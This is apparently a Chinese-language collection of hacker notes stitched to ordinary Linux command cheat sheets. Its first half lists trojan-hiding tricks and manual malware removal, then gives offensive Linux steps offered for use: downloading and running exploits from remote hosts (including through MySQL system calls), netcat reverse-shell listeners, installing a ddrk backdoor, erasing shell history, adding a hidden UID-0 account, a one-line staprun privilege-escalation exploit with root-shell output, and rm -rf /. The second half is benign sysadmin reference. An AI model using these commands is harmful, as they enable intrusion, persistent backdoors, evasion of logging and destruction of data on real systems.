病毒木馬隱藏技術:
1.rar:創建自解壓格式:
解壓前:ma.exe
解壓后:qq.exe
2.偽裝成圖片及記事本圖標:.jpg .txt
實際擴展名:.exe
3.利用捆綁器:正常文件+木馬
4.源分發:源代碼:木馬代碼
5.hook:鈎子:
ssdt-hook
inline-hook
fsd-hook
fsdinline-hook
6.文件資源區:圖標
7.進程守護:a b c
8..dll注入進程
9.dll本地劫持:ntdll.dll
手工殺馬:
vmxp:
installrite:快照
snap1 snap2
avafind:硬盤快速索引:ntdhcp.exe
進程管理工具;icesword:冰刃,snipeword:狙劍
啟動項:msconfig
服務:
文件位置:
數字簽名:
一。刪除QQ大盜
icesword--異常進程:ntdhcp.exe c:\windows\system32
刪除:
cd c:\windows\system32
attrib -s -r -h ntdhcp.exe
del ntdhcp.exe
二。手工殺病毒:
1.icesword:可疑進程
svchost.exe
c:\windows\system32
c:\windows\install
結束進程,刪除所有,重啟
2.恢復:
svchost.exe加載到od--右鍵--查看字符串:
c:\windows:ject.vbs
c:\windows\system32: softpro.dll ject.vbs
3.通過查看時間:
c:\windows\system32\bootlog.dll
tasklist /m bootlog.dll
winlogon.exe
icesword--進程--winlogon.exe--右鍵--模塊信息--強制解除
4.ie劫持:ifeo
regedit--編輯--查找:iexplore.exe
--惡意網址--》復制
{1f4de370-d627-11d1-ba4f-00a0c91eedba}
刪除主鍵
重新搜索:machine
nc -vv -l -p 443 nc端口轉發
wget http://computraining.nl/b.txt 下載編譯文件。
perl b.txt 編譯
cd /etc
ls -la
adduser fans
passwd 用戶 密碼
cat /etc/shadow 查看文件
chmod 777 文件或目錄
chmod 777 *
echo fans pass> /var/www/html/soft.php
cat /etc/ | grep 關鍵字
uname -a 版本
sysctl 內核
server 服務器
id 用戶組
cat shadow 看hash
pwd 目錄
gcc hoolyshit.c -o hoolyshit 編譯
useradd fans
grep :x:0: /etc/passwd
只有一行,我再強調一遍,在一個標准的Linux安裝里,grep命令應該只返回一行,類似以下:
root:x:0:0:root:/root:/bin/bash
假如在敲入之前的grep命令后你的系統返回的結果不止一行,那可能就有問題了。應該只有一個用戶的UID為0,而如果grep命令的返回結果超過一行,那就表示不止一個用戶。
你可以通過在shell提示符下敲入history來訪問你的歷史記錄文件。假如你發現自己 正在使用history命令,而它並沒有出現在之前使用過的命令列表里,你要看一看你的~/.bash_history 文件。假如這個文件是空的,就執行一個ls -l ~/.bash_history命令。在你執行了上述的命令后你將看到類似以下的輸出:
-rw------- 1 jd jd 13829 Oct 10 17:06 /home/jd/.bash_history
又或者,你可能會看到類似以下的輸出:
lrwxrwxrwx 1 jd jd 9 Oct 10 19:40 /home/jd/.bash_history -> /dev/null
假如你看到的是第二種,就表明這個 .bash_history 文件已經被重定向到/dev/null。
找web路徑了,直接執行
mysql>system vi /etc/httpd/conf/httpd.conf;
直接這樣就可以找到web的路徑,當然,我們的目的並不是找web路徑,放webshell進去。我們是要來做其他的事情,比如,下載exp執行, 搞到 root權限,然后裝后門蝦米的
mysql>system wget http://xxxx.xxx.com/xxxx ; mysql>system chmod +x xxxx; mysql>system ./xxxx;
這樣mysql的root此時就成為system的root了,剩下的事情,如果開了ssh,就ssh上去,輸入mysql的用戶密碼,ok,搞定。
拿webshell不多說
一。反彈cmdline shell
直接使用webshell中的反彈回來,本地nc監聽nc -vlp 12666
二。提權為root
uname -a 查看內核版本 尋找相應的exp提權
三。安裝ddrk后門
wget http://www.xx.com/ddrk.tgz
tar zxvf ddrk.tgz
cd ddrk
./setup pass port
注:
1.定義歷史命令變量,防止被記錄操作的命令
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0
2.添加root權限用戶
useradd -u 0 -g 0 -o 用戶
passwd 用戶
3.反彈回來時發現不是交互的,執行下列命令能夠交互式
python -c 'import pty;pty.spawn("/bin/sh")'
本文轉自: 黑客武林(www.hack50.com) 詳細出處參考:http://www.hack50.com/stu/sort091/sort0103/74268.html
一句話提權命令:
[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever
sh-3.2# uname -a
Linux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linux
sh-3.2# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
sh-3.2#
linux webshell下信息收集和一些提權常用的命令
發表於 2011 年 04 月 11 日 由 admin
收集。
cat ./../mainfile.php -查看mainfile.php文件內容ls -la – 查看文件列表.
ifconfig {eth0 etc} – 查看網卡信息.
ps aux – 查看運行進程.
gcc in_file -o out_file – 編譯c文件.
cat /etc/passwd – 查看系統賬號.
sudo – 普通用戶運行root權限的命令,前提是 /etc/sudoers中有此賬戶的規則.
id – 查看當前用戶各種id.
which wget curl w3m lynx – 查看當前可用的下載器
uname -r -查看內核版本信息 (or) cat /etc/release.
uname -a – 查看所有信息 (or) cat /etc/issue
last -30 -最后登錄的30個用戶.
useradd – 創建用戶.
usermod – 修改用戶屬性.
w -查看當前在線用戶.
locate password.txt – 查找password.txt文件位置
rm -rf / – 刪除系統所有文件,盡管不會完全刪除,但系統絕對崩潰,被傷心了才用此命令
arp -a – 查看同網段內其他主機.
lsattr -va -查看文件attr屬性
find / -type f -perm -04000 -ls – 查找所有suid權限的文件
find . -type f -perm -04000 -ls – 查找當前目錄suid文件
find / -type f -perm -02000 -ls – 所有sgid文件.
find / -perm -2 -ls – 查找所有可寫文件和目錄.
find . -perm -2 -ls – 當前目錄可寫文件和目錄.
find / -type f -name .bash_history – 查找所有 bash history文件.
netstat -an | grep -i listen – 查看監聽端口.
cut -d: -f1,2,3 /etc/passwd | grep :: – 查看無密碼賬號
find /etc/ -type f -perm -o+w 2> /dev/null – 查找etc目錄other組可寫文件
cat /proc/version /proc/cpuinfo – 查看cpu信息.
locate gcc- 查找gcc路徑.
set – 查看環境變量.
echo $PATH- 查看PATH信息.
lsmod- 查看內核模塊信息.
mount/df- 查看掛載分區信息.
rpm -qa- 查看rpm安裝信息.
dmesg- 查看各種硬件信息
cat /etc/syslog.conf – 查看syslog日志配置信息.
uptime – 查看主機運行時間.
cat /proc/meminfo -查看內存信息.
find / -type f -perm -4 -print 2> /dev/null- 查找可讀文件.
find / -type f -perm -2 -print 2> /dev/null – 查找可寫文件.
chmod ### $folder – 更改目錄權限.
ls -l -b – 查看文件詳細信息
系統信息
===========================================================================
系統
# uname -a # 查看內核/操作系統/CPU信息
# head -n 1 /etc/issue # 查看操作系統版本
# cat /proc/cpuinfo # 查看CPU信息
# hostname # 查看計算機名
# lspci -tv # 列出所有PCI設備
# lsusb -tv # 列出所有USB設備
# lsmod # 列出加載的內核模塊
# env # 查看環境變量
資源
# free -m # 查看內存使用量和交換區使用量
# df -h # 查看各分區使用情況
# du -sh # 查看指定目錄的大小
# grep MemTotal /proc/meminfo # 查看內存總量
# grep MemFree /proc/meminfo # 查看空閑內存量
# uptime # 查看系統運行時間、用戶數、負載
# cat /proc/loadavg # 查看系統負載
磁盤和分區
# mount | column -t # 查看掛接的分區狀態
# fdisk -l # 查看所有分區
# swapon -s # 查看所有交換分區
# hdparm -i /dev/hda # 查看磁盤參數(僅適用於IDE設備)
# dmesg | grep IDE # 查看啟動時IDE設備檢測狀況
網絡
# ifconfig # 查看所有網絡接口的屬性
# iptables -L # 查看防火牆設置
# route -n # 查看路由表
# netstat -lntp # 查看所有監聽端口
# netstat -antp # 查看所有已經建立的連接
# netstat -s # 查看網絡統計信息
進程
# ps -ef # 查看所有進程
# top # 實時顯示進程狀態
用戶
# w # 查看活動用戶
# id # 查看指定用戶信息
# last # 查看用戶登錄日志
# cut -d: -f1 /etc/passwd # 查看系統所有用戶
# cut -d: -f1 /etc/group # 查看系統所有組
# crontab -l # 查看當前用戶的計划任務
服務
# chkconfig --list # 列出所有系統服務
# chkconfig --list | grep on # 列出所有啟動的系統服務
程序
# rpm -qa # 查看所有安裝的軟件包
最近再一次拾起了Ubuntu,為了更好的玩兒轉Linux,專門到網上搜到的這些常用的終端命令,根據命令使用類別的不同分為了9個大類,都在下面一一列舉了出來,個人覺得還是很有用的,在以后的時間里,小弟會隨時更新自己對於Ubuntu的使用心得一.
文件目錄類
1.建立目錄:mkdir 目錄名
2.刪除空目錄:rmdir 目錄名
3.無條件刪除子目錄: rm -rf 目錄名
4.改變當前目錄:cd 目錄名 (進入用戶home目錄:cd ~;進入上一級目錄:cd -)
5.查看自己所在目錄:pwd
6.查看當前目錄大小:du
7.顯示目錄文件列表:ls -l (-a:增加顯示隱含目錄)
其中:藍:目錄;綠:可執行文件;紅:壓縮文件;淺藍:鏈接文件;灰:其他文件;紅底白字:錯誤的鏈接文件
8.瀏覽文件:more 文件名.txt;less 文件名.txt
9.復制文件: cp 源文件 目標文件 (-r:包含目錄)
10.查找文件:(1)find (2)locate 命令名
11.鏈接:(1)建立hard鏈接:ln 來源文件 鏈接文件(-d:創建目錄鏈接);(2)建立符號鏈接:ln -s 來源文件 鏈接文件
二.驅動掛載類
1.檢查硬盤使用情況:df -T -h
2.檢查磁盤分區:fdisk -l
3.掛載軟硬光區:mount -t /dev/fdx|hdax /mnt/目錄名
其中::modos--FAT16;vfat--FAT32;ntfs--NTFS;光驅--iso9660
支持中文名:mount -o iocharset=x /dev/hdax /mnt/目錄名(其中:x=cp936或
掛載光驅:mount -t auto /dev/cdrom /mnt/cdrom
掛載ISO文件:mount -t iso9660 -o loop xxx.iso /path
4.解除掛載:umount /mnt/目錄名
解除所有掛載:umount -a
5.建立文件系統:mkfs -t /dev/hdxx。其中:ftype:ext2、ext3、swap等
三.程序安裝類
1.RPM包安裝:(1)安裝 rpm -ivh somesoft.rpm
(2)反安裝 rpm -e somefost.rpm
(3)查詢 rpm -q somefost 或 rpm -qpi somefost.rpm(其中:p未安裝;i包含的信息)
(4)查詢安裝后位置:rpm -ql somefost.rpm
(5)升級安裝:rpm -Uvh somesoft.rpm
(6)強制安裝:rpm -ivh --nodeps somesoft.rpm 或 rpm -ivh --nodeps --force somesoft.rpm
2.源代碼包安裝:
查閱README
基本用法 (1)配置:解壓目錄下 ./configure
(2)編譯:解壓目錄下 make
(3)安裝:解壓目錄下 make install
3.src.rpm的安裝
需要用到rpmbuild命令加上--rebuild參數。如 rpmbuild --rebuild ***.src.rpm。然后在/usr/src/下找
3.FC3下iso程序安裝:system-config-packages --isodir=iso所在目錄
RH下iso程序安裝:redhat-config-packages --isodir=iso所在目錄
四.壓縮解壓類
1.tar.gz類:(1)解壓:tar -xvzf 文件.tar.gz;(2)tar.gz解至tar:gzip -d 文件.tar.gz(2)壓縮:gzip 待壓縮文件
2.tar未壓縮類:(1)解包:tar -xvf 文件.tar;(2)打包:tar -cvf 文件.tar 文件列表
3.zip類:(1)解壓:unzip 文件.zip -d dir;(2)壓縮:zip zipfile 待壓縮文件列表
4.bz2類:(1)解壓:bunzip2 文件.bz2或bzip2 -d 文件.bz2;(2)壓縮:bzip2 待壓縮文件
5.z類:(1)解壓:uncompress 文件.z;(2)壓縮:compress 文件
五.進程控制類
1.列出當前進程ID:ps -auxw
2.終止進程:(1)終止單一進程:kill 進程ID號
(2)終止該程序所有進程:Killall 程序名
(3)終止X-Window程序:xkill
3.查看資源占用情況:(1)top (2)free (3)dmesg
4.查看環境變量值:env
5.重啟:(1)reboot (2)Ctrl Alt Del (3)init 6
6.關機:(1)shutdown -h now (2)halt (3)init 0
7.切換桌面:switchdesk gnome|KDE|...
六.程序運行類
1.查詢命令:whereis 命令名
2.后台運行X-Window程序:程序名&
3.強行退出X-Window程序:Ctrl Alt Backspace
4.查看幫助:
(1)簡明幫助:命令名 --help | less
(2)更多幫助:man 命令名
(3)info 命令名
(4)help 命令名
5.查看系統路徑:echo $PATH
6.查看當前shell堆棧:echo $SHLVL
7.< / >:輸入/輸出重定向;|:管道左的輸入是管道右輸入
六.用戶帳號類
1.增加用戶帳號:(1)用 戶 名:adduser 用戶帳號名
(2)設置密碼: passwd 用戶帳號名
2.刪除用戶帳號:userdel 用戶帳號名
3.增加用戶組:groupadd 用戶組名
4.刪除用戶組:groupdel 用戶組名
5.暫時終止用戶帳號:passwd -l 用戶帳號名
6.恢復被終止帳號:passwd -u 用戶帳號名
7.權限設定
(1)chmod -a|u|g|o |-|=r|w|x 文件/目錄名
其中:a--所有用戶(all);u--本用戶(user);g--用戶組(group);o--其他用戶(other users)
--增加權限;---刪除權限;=--設置權限
文件:r--只讀權限(read);w--寫權限(write);x--執行權限(execute)
目錄:r--允許列目錄下文件和子目錄;w--允許生成和刪除目錄下文件;x--允許訪問該目錄
(2)chmod xxx 文件/目錄名
其中:execute=1;write=2;read=4
x取值:0--沒有任何權限(常用);1--只能執行(不常見);2--只能寫(不常見);3--只能寫和執行(不常見);4--只讀(常見);5--只讀和執行(常見);6--讀和寫(常見);7--讀.寫和執行
七.vi編輯類
1.進入后為命令模式:(1)插入i;(2)打開0;(3)修改c;(4)取代r;(5)替換s
2.經(1)后進入全屏幕編輯模式。
3.命令模式-->編輯模式(a/i);編輯模式-->命令模式(Esc);命令模式-->末行模式(:)。
4.:w/w newfile保存
5.:q/q!退出iv;:wq保存退出
八.網絡服務
1.顯示網絡接口參數:ifconfig
2.顯示系統郵件:mail
3.啟動/終止web服務:httpd -k start|stop|restart
4.查看網絡狀況:(1)聯機狀況:ping xxx.xxx.xxx.xxx;
(2)顯示網絡狀況:netstat ,其中:options:-a==所有sockets;-l==包含網絡設備;-n==數字IP;
-o==其他信息;-r==路由表;-t==只列TCP sockets;-u==只列UDP sockets;-w==只列raw sockets;
-x==只列Unix Domain sockets
九.其他類
1.顯示顯卡3D信息:glxinfo和glxgears